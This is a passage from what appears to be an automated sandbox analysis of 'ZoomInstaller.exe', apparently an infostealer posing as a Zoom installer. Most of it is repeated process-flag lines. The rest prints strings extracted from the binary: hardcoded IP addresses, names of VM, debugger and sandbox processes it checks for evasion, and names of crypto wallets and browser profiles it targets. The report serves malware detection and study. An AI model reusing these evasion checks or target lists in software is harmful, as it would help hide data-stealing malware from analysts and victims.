    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\tasklist.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\tasklist.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\tasklist.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

    Malware Analysis System Evasion

    barindex
    Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
    Source: ZoomInstaller.exeBinary or memory string: SCHED={PC:, GP->STATUS= PLUGINPATH= : UNKNOWN PC CALLED FROM RUNTIME: PID=LEVEL 3 RESETSRMOUNT ERRORTIMER EXPIREDEXCHANGE FULLREGENUMKEYEXWREGOPENKEYEXWCERTOPENSTOREFINDNEXTFILEWMAPVIEWOFFILEVIRTUALUNLOCKWRITECONSOLEWFREEADDRINFOWGETHOSTBYNAMEGETSERVBYNAMEPARSING TIME OUT OF RANGE IS TOO LARGENOT AVAILABLEDALTLDPSUGCT?3814697265625GETTEMPPATH2WMODULE32NEXTWRTLGETVERSIONREGENUMVALUEWIMAGELIST_ADDCREATERECTRGNGETDEVICECAPSSETBRUSHORGEXCREATEACTCTXWFINDRESOURCEWRTLMOVEMEMORYCOTASKMEMFREEOLEINITIALIZESYSFREESTRINGWGLSHARELISTSPDHCLOSEQUERYSHELLEXECUTEWANIMATEWINDOWDESTROYWINDOWDRAWFOCUSRECTGETCLASSNAMEWGETCLIENTRECTGETMENUITEMIDGETSCROLLINFOGETSYSTEMMENUGETWINDOWRECTOPENCLIPBOARDSETSCROLLINFOGETTHEMECOLOROPENTHEMEDATAENUMPRINTERSWNAME TOO LONGTLSMAXRSASIZEACCESS DENIEDUSER CANCELEDPKCS1WITHSHA1ECDSAWITHSHA1CLIENT_RANDOMGZIP, DEFLATEGOCACHEVERIFYINSTALLGOROOTHTML/TEMPLATEREGDELETEKEYWDELETESERVICESTARTSERVICEWGETDRIVETYPEWTHREAD32FIRSTWAITCOMMEVENTRTLINITSTRINGENUMPROCESSESEXITWINDOWSEXTIMEENDPERIODWTSFREEMEMORYINVALID ASN.1SHA256-RSAPSSSHA384-RSAPSSSHA512-RSAPSSEMAIL ADDRESSSHARED_SECRETEMPTY INTEGERUNSUPPORTED: 181.214.153.11194.154.78.137213.33.190.21988.153.199.169194.154.78.16092.211.109.160188.105.91.11634.141.146.114188.105.91.173193.128.114.4588.132.227.23888.132.226.20388.132.225.10092.211.192.144192.211.110.74188.105.91.143178.239.165.7034.253.248.228TVAUENRRRAOKWAVMWARE SVGA 3DVMWAREUSER.EXEXENSERVICE.EXEVMWARETRAY.EXECHROME DEFAULTYANDEX DEFAULTCOCCOC DEFAULTIS A DIRECTORY_SECURE_DELETEUNEXPECTED EOFINTERNAL ERRORGETPROTOBYNAMEUNKNOWN MODE: CONTENT-LENGTHMAX_FRAME_SIZEPROTOCOL_ERRORINTERNAL_ERRORREFUSED_STREAMERR_UNKNOWN_%DACCEPT-CHARSETCONTENT-LENGTHREAD_FRAME_EOFUNKNOWN ERROR UNKNOWN CODE: NOT ACCEPTABLECOMPUTERNAMEEX
    Source: ZoomInstaller.exeBinary or memory string: MOREBUF={PC:: NO FRAME (SP=RUNTIME: FRAME TS SET IN TIMERTRACEBACK STUCKADVERTISE ERRORKEY HAS EXPIREDNETWORK IS DOWNNO MEDIUM FOUNDNO SUCH PROCESSGETADAPTERSINFOCREATEHARDLINKWDEVICEIOCONTROLFLUSHVIEWOFFILEGETCOMMANDLINEWGETSTARTUPINFOWPROCESS32FIRSTWUNMAPVIEWOFFILEFAILED TO LOAD FAILED TO FIND : CANNOT PARSE ,M3.2.0,M11.1.0476837158203125IMPERSONATESELFOPENTHREADTOKENINVALID ARGSIZE<INVALID VALUE>REFLECTLITE.SETEXCLUDECLIPRECTGETENHMETAFILEWGETTEXTMETRICSWPLAYENHMETAFILEGDIPLUSSHUTDOWNGETTHREADLOCALEOLEUNINITIALIZEWGLGETCURRENTDCDRAGACCEPTFILESCALLWINDOWPROCWCREATEPOPUPMENUCREATEWINDOWEXWDIALOGBOXPARAMWGETACTIVEWINDOWGETDPIFORWINDOWGETRAWINPUTDATAINSERTMENUITEMWISWINDOWENABLEDISWINDOWVISIBLEPOSTQUITMESSAGESETACTIVEWINDOWSETWINEVENTHOOKTRACKMOUSEEVENTWINDOWFROMPOINTDRAWTHEMETEXTEXACCEPT-LANGUAGEX-FORWARDED-FOR()<>@,;:\"/[]?=INVALID POINTERX509KEYPAIRLEAFRECORD OVERFLOWBAD CERTIFICATEPKCS1WITHSHA256PKCS1WITHSHA384PKCS1WITHSHA512CLIENTAUTHTYPE(UNKNOWN VERSIONJSTMPLLITINTERPTARINSECUREPATHX509USEPOLICIESREGCREATEKEYEXWREGDELETEVALUEW IS UNAVAILABLEGETSECURITYINFOSETSECURITYINFOADDDLLDIRECTORYFINDNEXTVOLUMEWFINDVOLUMECLOSEGETCOMMTIMEOUTSISWOW64PROCESS2QUERYDOSDEVICEWSETCOMMTIMEOUTSSETVOLUMELABELWRTLDEFAULTNPACLCLSIDFROMSTRINGSTRINGFROMGUID2ISWINDOWUNICODETIMEBEGINPERIOD0601021504Z0700INVALID BOOLEANNON-MINIMAL TAGUNKNOWN GO TYPEAVX512VPOPCNTDQHTTP TOOLKIT.EXEJOEBOXSERVER.EXE0123456789ABCDEFREAD AFTER CLOSEAFTER OBJECT KEYGETDESKTOPWINDOW2006-01-02 15:042006-01-02T15:04STRING TOO LARGE_WRITABLE_SCHEMAAUTH_USER_CHANGEAUTH_USER_DELETEDIVISION BY ZERO()<>@,;:\"/[]?= HOSTLOOKUPORDER=/ETC/RESOLV.CONFNON-IPV4 ADDRESSNON-IPV6 ADDRESSUNKNOWN NETWORK NO COLON ON LINESETTINGS_TIMEOUTFRAME_SIZE_ERRORCONTENT-ENCODINGCONTENT-ENCODINGCONTENT-LANGUAGECONTENT-LOCATIONWWW-AUTHENTICATEPROXY-CONNECTIONREAD_FRAME_OTHER%S %S HTTP/1.1
    Source: ZoomInstaller.exeBinary or memory string: HANDSHAKEMATH/RANDWINMM.DLLPURGECOMMSETUPCOMMINFO_HASHQ9IATRKPRHQARZHRDBPJD1BNJKFVLHPXMDUOPVYXX64DBG.EXEX96DBG.EXEVMSRVC.EXEX32DBG.EXEPRL_CC.EXECHROME.EXEMSEDGE.EXEMOTDEPASSEPASSPHRASESAUVEGARDEMATHWALLETEVERWALLETPETRAAPTOSFEWCHAMOVEPALIWALLETMETAMASK_EMETAMASK_O FOR TYPE USER32.DLL2006-01-02_AUTH_USER_AUTH_PASS_AUTH_SALTIMPOSSIBLE
    Source: ZoomInstaller.exeBinary or memory string: INVALID EXCHANGENO ROUTE TO HOSTINVALID ARGUMENTMESSAGE TOO LONGOBJECT IS REMOTEREMOTE I/O ERRORSETFILEPOINTEREXOPENPROCESSTOKENREGQUERYINFOKEYWREGQUERYVALUEEXWDNSNAMECOMPARE_WCREATEDIRECTORYWFLUSHFILEBUFFERSGETCOMPUTERNAMEWGETFULLPATHNAMEWGETLONGPATHNAMEWREMOVEDIRECTORYWNETAPIBUFFERFREETIME: BAD [0-9]*2384185791015625GODEBUG: VALUE "DUPLICATETOKENEXGETCURRENTTHREADRTLVIRTUALUNWIND: VALUE OF TYPE CONTEXT CANCELEDIMAGELIST_CREATEIMAGELIST_DRAWEXGETOPENFILENAMEWGETSAVEFILENAMEWCLOSEENHMETAFILECOPYENHMETAFILEWCREATEDIBSECTIONGETVIEWPORTORGEXSETVIEWPORTORGEXGDIPDISPOSEIMAGEGETCONSOLETITLEWGETCONSOLEWINDOWGETMODULEHANDLEWGETNUMBERFORMATWCOCREATEINSTANCECOGETCLASSOBJECTWGLCREATECONTEXTWGLDELETECONTEXTPDHVALIDATEPATHWADJUSTWINDOWRECTBRINGWINDOWTOTOPDISPATCHMESSAGEWENUMCHILDWINDOWSGETCLIPBOARDDATAGETMENUITEMCOUNTGETMENUITEMINFOWGETSYSCOLORBRUSHGETSYSTEMMETRICSISDIALOGMESSAGEWUNREGISTERCLASSWREGISTERCLASSEXWSETCLIPBOARDDATASETMENUITEMINFOWTRACKPOPUPMENUEXTRANSLATEMESSAGEGETTHEMEPARTSIZECONTENT-LANGUAGEINVALID DNS NAMERCODEFORMATERRORUNPACKING HEADERNO RENEGOTIATIONSIGNATURESCHEME(INVALID ENCODINGSETENTRIESINACLWSETSERVICESTATUSCRYPTPROTECTDATACRYPTQUERYOBJECTCONNECTNAMEDPIPECREATEJOBOBJECTWCREATENAMEDPIPEWDEFINEDOSDEVICEWFINDFIRSTVOLUMEWGETLOGICALDRIVESGETNAMEDPIPEINFOGETPRIORITYCLASSSETDLLDIRECTORYWSETFILEVALIDDATASETPRIORITYCLASSVIRTUALPROTECTEXRTLGETCURRENTPEBGETGUITHREADINFOWINVERIFYTRUSTEXLENGTH TOO LARGEAVX512VPCLMULQDQFIDDLER.WEBUI.EXEVGAUTHSERVICE.EXEPROCESSHACKER.EXEJOEBOXCONTROL.EXEWRITE AFTER CLOSEREFLECT.VALUE.INTIN STRING LITERAL0123456789ABCDEFX0123456789ABCDEFX%%!%C(BIG.INT=%S)MULTIPARTMAXPARTSMESSAGE TOO LARGEINVALID STREAM IDTRANSFER-ENCODINGHEADER_TABLE_SIZECOMPRESSION_ERRORENHANCE_YOUR_CALMHTTP_1_1_REQUIREDIF-MODIFIED-SINCEFRAME_PING_LENGTHTRUNCATED HEADERSIF-MODIFIED-SINCETRANSFER-ENCODINGX-FORWARDED-PROTOX-IDEMPOTENCY-KEYMOVED PERMANENTLYFAILED DEPENDENCYTOO MANY REQUESTSWINREADLINKVOLUMEEXEC: KILLING CMDEXEC: NOT STARTEDGOROUTINE PROFILEALLTHREADSSYSCALLGC ASSIST MARKINGSELECT (NO CASES)SYNC.RWMUTEX.LOCKWAIT FOR GC CYCLETRACE PROC STATUSSYNC.(*COND).WAIT: MISSING METHOD NOTETSLEEPG ON G0BAD TINYSIZECLASSKEY ALIGN TOO BIGRUNTIME: POINTER G ALREADY SCANNEDMARK - BAD STATUSSCANOBJECT N == 0SWEPT CACHED SPANMARKBITS OVERFLOWRUNTIME: SUMMARY[RUNTIME: LEVEL = , P.SEARCHADDR = RTLGETCURRENTPEBRUNTIME.NEWOSPROCRUNTIME/INTERNAL/THREAD EXHAUSTIONLOCKED M0 WOKE UPENTERSYSCALLBLOCK SPINNINGTHREADS=GP.WAITING != NILUNKNOWN CALLER PCSTACK: FRAME={SP:RUNTIME: NAMEOFF RUNTIME: TYPEOFF RUNTIME: TEXTOFF PERMISSION DENIEDWRONG MEDIUM TYPENO DATA AVAILABLEEXEC FORMAT 